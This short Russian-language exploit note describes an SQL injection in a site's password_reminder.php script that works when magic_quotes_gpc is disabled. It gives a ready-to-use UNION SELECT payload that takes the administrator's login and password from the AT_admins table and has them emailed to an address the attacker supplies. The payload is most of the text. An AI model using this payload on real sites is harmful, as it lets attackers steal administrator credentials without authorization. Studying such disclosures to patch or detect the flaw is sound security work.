При выключенном magic_quotes_gpc в php.ini можно выполнить SQL-инъекцию
без регистрации на сайте, используя при этом скрипт для напоминания пароля (администратора сайта):
http://[target]/[path]/password_reminder.php
SQL-запрос:
' UNION SELECT login, password, 'your_email domain.com' FROM AT_admins /*